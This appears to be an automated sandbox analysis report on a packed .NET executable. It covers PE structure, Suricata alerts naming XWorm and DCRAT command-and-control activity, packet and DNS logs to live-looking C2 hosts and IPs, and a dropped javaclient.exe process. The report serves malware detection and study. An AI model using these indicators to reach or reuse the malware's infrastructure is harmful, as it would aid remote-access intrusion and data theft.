                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x11fd100x4b.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1200000x16de8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x11dd640x11de007cf9d0c7f951d98a1427706125733750False0.9969537398885002data7.998330200111187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x1200000x16de80x16e00eb57413793246479baadebb2ab570faaFalse0.9925503756830601data7.9574797382340545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1380000xc0x2005b662fac47906c0e4758c7e2b95470baFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1201300x16852PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9991110340192103
                                    RT_GROUP_ICON0x1369840x14Targa image data - Map 65536 x 26706 x 10.85
                                    RT_VERSION0x1369980x264data0.46405228758169936
                                    RT_MANIFEST0x136bfc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                    2024-08-06T11:52:51.212378+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4971610314192.168.2.9147.185.221.17
                                    2024-08-06T11:54:05.009491+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4972010314192.168.2.9147.185.221.17
                                    2024-08-06T11:54:31.399989+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4972110314192.168.2.9147.185.221.17
                                    2024-08-06T11:52:15.171137+0200TCP2034194ET MALWARE DCRAT Activity (GET)4971380192.168.2.9141.8.192.26

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 6, 2024 11:52:15.204010010 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:15.208976030 CEST1031449715147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:15.209067106 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:15.312932014 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:15.318523884 CEST1031449715147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:28.129138947 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:28.134190083 CEST1031449715147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:36.583637953 CEST1031449715147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:36.583719015 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:37.578835011 CEST4971510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:37.580859900 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:37.583754063 CEST1031449715147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:37.585860968 CEST1031449716147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:37.585947990 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:37.632034063 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:37.636888027 CEST1031449716147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:51.212378025 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:51.217370033 CEST1031449716147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:58.958467007 CEST1031449716147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:58.958610058 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:59.946429014 CEST4971610314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:59.948026896 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:59.954040051 CEST1031449716147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:59.954056025 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:52:59.954145908 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:59.985930920 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:52:59.990715027 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:10.181246042 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:10.186199903 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:20.384371996 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:20.389317036 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:21.336042881 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:21.336179972 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:23.946516037 CEST4971810314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:23.951538086 CEST1031449718147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:23.951590061 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:23.956558943 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:23.960261106 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:24.108155012 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:24.121643066 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:25.306302071 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:25.312699080 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:25.854096889 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:25.859817028 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:32.509650946 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:32.514722109 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:45.165755033 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:45.171535969 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:45.365432024 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:45.365518093 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:49.384139061 CEST4971910314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:49.386205912 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:49.389023066 CEST1031449719147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:49.391073942 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:49.391163111 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:49.445847988 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:49.450738907 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:52.821964025 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:52.827009916 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:53.587399960 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:53.592338085 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:53.744182110 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:53.749144077 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:53.808387995 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:53.813395023 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:54.728100061 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:54.733023882 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:54.759284973 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:54.764169931 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:54.774943113 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:54.780409098 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:54.821829081 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:54.827615023 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:53:54.868940115 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:53:54.873809099 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:04.978692055 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:04.983627081 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:04.993729115 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:04.998790026 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:05.009490967 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:05.014538050 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:08.603410006 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:08.608314991 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:09.150120020 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:09.157135010 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.087678909 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.093075037 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.587502956 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.592636108 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.618810892 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.623867989 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.665644884 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.670586109 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.784596920 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.784657001 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.784720898 CEST4972010314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.786523104 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.789978981 CEST1031449720147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.791496038 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.791552067 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.824459076 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.829489946 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.837333918 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.842308044 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.852982998 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.858230114 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.946876049 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.951780081 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.978044987 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.982917070 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.993717909 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.000504017 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.087502956 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.092562914 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.165716887 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.399656057 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.572175026 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.572192907 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:16.262171984 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:16.267026901 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:21.290643930 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:21.295595884 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:21.306200981 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:21.310971975 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:24.200282097 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:24.207098961 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:24.463613033 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:24.468488932 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.384494066 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.389445066 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.399988890 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.404858112 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.415654898 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.420597076 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.525007963 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.529776096 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.540590048 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.545418978 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.556302071 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.561737061 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.587524891 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.592550039 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:32.174336910 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:32.176444054 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.587559938 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.590099096 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.592533112 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:36.596695900 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:36.600311041 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.640774012 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.645754099 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:39.728104115 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:39.732950926 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:39.837474108 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:39.842271090 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.853204012 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.858035088 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.884407997 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.889238119 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.915589094 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.920523882 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.931184053 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.936062098 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.946804047 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.951761007 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.993815899 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.998617887 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.150067091 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.155827045 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.181229115 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.186079979 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.259438038 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.265279055 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.290618896 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.296366930 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.353154898 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.358015060 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.368802071 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.373625040 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.447009087 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.451780081 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.957221031 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.957381964 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.540446043 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.545577049 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.545618057 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.552265882 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.554382086 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.697635889 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.703696012 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.743771076 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.749281883 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.759287119 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.765109062 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.806643009 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.811999083 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:09.886271000 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:09.891169071 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:11.884634018 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:11.891197920 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:12.884433985 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:12.889547110 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:12.915648937 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:12.922849894 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:23.925520897 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:23.926397085 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.182284117 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.186286926 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.187163115 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.191294909 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.191481113 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.330308914 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.335269928 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.837698936 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:29.001611948 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:32.790692091 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:32.795619965 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:33.790800095 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:33.795583963 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:34.806401968 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:34.811228037 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:37.915734053 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:37.920970917 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:38.606292009 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:38.611205101 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:39.337712049 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:39.342665911 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.900424957 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.905422926 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.931473970 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.936513901 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.947096109 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.951898098 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.993905067 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.998809099 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.150172949 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:49.155101061 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.584239960 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.584310055 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.181399107 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.185331106 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.186306953 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.190186024 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.194448948 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.281335115 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.286452055 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.293327093 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.298242092 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:55.322115898 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:55.327289104 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:56:02.291069031 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:56:02.296155930 CEST1031449725147.185.221.17192.168.2.9

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 6, 2024 11:52:14.402239084 CEST5962753192.168.2.91.1.1.1
                                    Aug 6, 2024 11:52:14.451356888 CEST53596271.1.1.1192.168.2.9
                                    Aug 6, 2024 11:52:15.159441948 CEST6125453192.168.2.91.1.1.1
                                    Aug 6, 2024 11:52:15.199506998 CEST53612541.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 6, 2024 11:52:14.402239084 CEST192.168.2.91.1.1.10x840aStandard query (0)a1013249.xsph.ruA (IP address)IN (0x0001)false
                                    Aug 6, 2024 11:52:15.159441948 CEST192.168.2.91.1.1.10x9f9aStandard query (0)light-liable.gl.at.ply.ggA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 6, 2024 11:51:49.928139925 CEST1.1.1.1192.168.2.90xbeccNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Aug 6, 2024 11:51:49.928139925 CEST1.1.1.1192.168.2.90xbeccNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Aug 6, 2024 11:52:14.451356888 CEST1.1.1.1192.168.2.90x840aNo error (0)a1013249.xsph.ru141.8.192.26A (IP address)IN (0x0001)false
                                    Aug 6, 2024 11:52:15.199506998 CEST1.1.1.1192.168.2.90x9f9aNo error (0)light-liable.gl.at.ply.gg147.185.221.17A (IP address)IN (0x0001)false

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:05:51:53
                                    Start date:06/08/2024
                                    Path:C:\Users\user\Desktop\cougif6lqM.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\cougif6lqM.exe"
                                    Imagebase:0xd70000
                                    File size:1'265'664 bytes
                                    MD5 hash:2BBC8212C548DCB848224A882B32492A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Users\user\AppData\Local\Temp\javaclient.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Temp\javaclient.exe"
                                    Imagebase:0xec0000
                                    File size:151'040 bytes
                                    MD5 hash:2F969595E0DD360ECD52126BF5ECE5E5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
